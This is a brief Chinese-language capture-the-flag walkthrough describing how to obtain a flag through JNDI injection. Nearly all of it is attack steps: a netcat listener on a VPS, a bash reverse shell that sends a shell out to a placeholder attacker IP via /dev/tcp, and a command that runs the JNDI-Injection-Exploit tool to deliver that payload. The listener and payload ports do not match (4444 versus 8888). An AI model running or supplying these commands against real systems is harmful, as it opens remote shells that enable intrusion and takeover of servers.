1、VPS打开监听
nc -lvvp 4444
#顺便写个payload
bash -i >& /dev/tcp/your-ip/8888 0>&1
2、payload转化
java.lang.Runtime.exec() Payload Workarounds - @Jackson_T
准备真正的payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "上面的payload" -A "your-ip"
打开JNDI-监听
获得flag